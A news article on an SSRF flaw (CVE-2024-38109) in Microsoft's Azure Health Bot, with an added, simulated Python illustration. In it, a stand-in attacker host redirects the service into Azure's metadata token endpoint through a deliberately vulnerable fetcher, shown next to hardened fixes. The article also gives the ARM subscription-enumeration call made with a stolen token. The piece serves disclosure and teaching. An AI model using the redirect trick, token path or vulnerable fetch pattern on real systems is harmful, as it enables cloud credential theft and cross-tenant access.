Microsoft has disclosed and patched a vulnerability in Azure Health Bot, a managed, AI-powered cloud platform that healthcare organizations use to build virtual care assistants. Tenable researchers explained how they gained access and why the fix was urgent.
WHY IT IS IMPORTANT
The HIPAA-compliant Health Bot platform combines medical data with natural language capabilities to understand clinical terminology for use in clinical care, Microsoft said on its website.
Healthcare institutions can use the Health Bot to create customized virtual assistants for clinical staff.
On August 13, Microsoft assigned CVE-2024-38109 to the elevation of privilege vulnerability, a server-side request forgery in the service. In its advisory, Microsoft said the flaw had not been publicly disclosed or exploited and rated further exploitation as less likely.
Through the server-side request forgery, Tenable researchers obtained an access token for management.azure.com. Using it against the Azure Resource Manager application programming interface (API), they could enumerate the subscriptions the token had access to, which revealed a subscription ID internal to Microsoft, Infosecurity Magazine reported on Wednesday.
The researchers reported the issue to Microsoft on June 17, and fixes were rolled out to affected environments by July 2, the story said. The vulnerability was resolved by rejecting redirect status codes for data connection endpoints.
In a blog post on Tuesday, Tenable researchers said they had found multiple privilege escalation issues in Azure Health Bot stemming from a server-side request forgery, which gave them access to cross-tenant resources.
Tenable said its researchers were interested in data connections, which allow bots to communicate with external data sources to pull information from other services a provider might use, "such as a patient information portal or a reference database for general medical information."
“Given the level of access provided, it is likely that lateral movement to other sources would have been possible,” the researchers said.
They said they also found another endpoint, used to validate data connections for Fast Healthcare Interoperability Resources (FHIR) endpoints, that was "more or less vulnerable to the same attack." However, Tenable said the FHIR endpoint vector did not yield the same access.
Microsoft's August security update report also covered nine zero-day vulnerabilities, six of which had been exploited.
THE BIGGER TREND
Under its Health IT Certification Program rules, the U.S. Department of Health and Human Services requires all certified electronic health record systems to expose FHIR APIs, which Azure Health Bot can connect to.
Because FHIR is a framework, vulnerabilities that are discovered are typically traced to the way data and application developers implement it. The FHIR standard is widely embraced as part of the future of healthcare interoperability.
In June, the Office of the National Coordinator for Health Information Technology and the Health Resources and Services Administration reported that HRSA had begun using FHIR-based APIs to streamline reporting processes and improve data quality. Additionally, since April, HRSA had been receiving live data reports from the Uniform Data System.
"The (United States Core Data for Interoperability, a standardized set of health data classes and elements) and Bulk FHIR are designed to provide the digital glue for a learning healthcare system and full accountability for the performance of these providers in a modern way with big data," Don Rucker, former ONC chief and chief strategy officer at 1upHealth, told Healthcare IT News at the time of the agencies' announcement.
ON THE RECORD
“This data connection feature is designed to allow the service backend to make requests to third-party APIs,” Tenable researchers wrote in the blog post.
“While testing these data connections to see if they could interact with endpoints within the service, Tenable researchers discovered that many common endpoints, such as Azure’s Internal Metadata Service, were properly filtered or inaccessible. However, upon closer inspection, it was discovered that issuing redirect responses (e.g., 301/302 status codes) allowed these mitigations to be bypassed.”
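As an added illustration (not code from Tenable's write-up or from the Azure Health Bot service), the following Python models the class of bug the quote describes, and the fix the story attributes to Microsoft: an egress filter that validates only the URL the tenant supplies and then follows a 3xx redirect without re-checking the new target, so an attacker-controlled host can bounce the backend into the Azure Instance Metadata Service at 169.254.169.254. The hosts, URLs, responses and token are constructed, and nothing touches the network; 169.254.169.254 and the IMDS token path are the real, documented Azure values. The real IMDS also requires a `Metadata: true` request header, and how the Health Bot data connection feature handled request headers is not modelled here. Two hardened variants follow: rejecting redirect responses outright, as the story says Microsoft did, and re-validating every hop.

```python
"""Model of a redirect-based SSRF filter bypass.

Added example, not code from Tenable's write-up or from Azure Health Bot.
Hosts, URLs, responses and the token below are all constructed; there is
no network access. 169.254.169.254 is the real, well-known address of the
Azure Instance Metadata Service (IMDS).
"""
import ipaddress
from urllib.parse import urlparse

IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)
REDIRECT_STATUSES = {301, 302, 303, 307, 308}

# Constructed stand-in for the network: URL -> (status, headers, body).
FAKE_NETWORK = {
    # a legitimate third-party data source (constructed hostname)
    "https://portal.example-hospital.test/api/patient": (200, {}, '{"patient": "demo"}'),
    # attacker-controlled host that answers with a redirect into the IMDS
    "https://evil.example.test/redirect": (302, {"Location": IMDS_TOKEN_URL}, ""),
    # what the IMDS would hand back (constructed token value)
    IMDS_TOKEN_URL: (200, {}, '{"access_token": "eyJ.constructed.token"}'),
}


class BlockedRequest(Exception):
    """Raised when the egress filter refuses a request."""


def is_forbidden_target(url: str) -> bool:
    """Egress filter: refuse non-HTTP schemes and internal, link-local or loopback targets."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return True
    host = parsed.hostname.lower()
    if host in ("localhost", "metadata", "metadata.azure.internal"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name. Resolution (and DNS rebinding) is not modelled here.
        return False
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def fake_http_get(url: str):
    """Stand-in for an outbound HTTP GET against the constructed network."""
    return FAKE_NETWORK.get(url, (404, {}, ""))


def vulnerable_fetch(url: str, max_redirects: int = 5):
    """Validates only the tenant-supplied URL, then follows redirects blindly."""
    if is_forbidden_target(url):
        raise BlockedRequest(f"refused: {url}")
    for _ in range(max_redirects + 1):
        status, headers, body = fake_http_get(url)
        if status in REDIRECT_STATUSES and "Location" in headers:
            url = headers["Location"]  # BUG: the redirect target is never re-checked
            continue
        return status, body
    raise BlockedRequest("too many redirects")


def hardened_fetch_no_redirects(url: str):
    """The fix the story attributes to Microsoft: reject any redirect response."""
    if is_forbidden_target(url):
        raise BlockedRequest(f"refused: {url}")
    status, headers, body = fake_http_get(url)
    if status in REDIRECT_STATUSES:
        raise BlockedRequest(f"redirect responses are not permitted (got {status})")
    return status, body


def hardened_fetch_revalidating(url: str, max_redirects: int = 5):
    """Alternative: follow redirects, but run the egress filter on every hop."""
    for _ in range(max_redirects + 1):
        if is_forbidden_target(url):
            raise BlockedRequest(f"refused: {url}")
        status, headers, body = fake_http_get(url)
        if status in REDIRECT_STATUSES and "Location" in headers:
            url = headers["Location"]
            continue
        return status, body
    raise BlockedRequest("too many redirects")


def is_blocked(fetch, url: str) -> bool:
    """True if the given fetch function refuses the URL."""
    try:
        fetch(url)
    except BlockedRequest:
        return True
    return False


if __name__ == "__main__":
    attacker_url = "https://evil.example.test/redirect"
    print("direct IMDS request blocked:", is_blocked(vulnerable_fetch, IMDS_TOKEN_URL))
    print("via redirect (vulnerable):", vulnerable_fetch(attacker_url))
    print("via redirect (no redirects):", is_blocked(hardened_fetch_no_redirects, attacker_url))
    print("via redirect (revalidating):", is_blocked(hardened_fetch_revalidating, attacker_url))
```

A direct request for the IMDS is refused by all three fetchers; only `vulnerable_fetch` hands back the constructed token when the attacker's host redirects to it. Rejecting redirects is the simpler fix, since per-hop validation still leaves DNS rebinding and name-resolution timing to deal with. The enumeration step the article describes is then a standard Azure Resource Manager call with the stolen token: `GET https://management.azure.com/subscriptions?api-version=2020-01-01` with an `Authorization: Bearer` header lists every subscription the token can see.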
Andrea Fox is Editor-in-Chief of Healthcare IT News.
Email address: afox@himss.org
Healthcare IT News is a publication of HIMSS Media.
The HIMSS Healthcare Cybersecurity Forum is scheduled for October 31-November 1 in Washington, DC.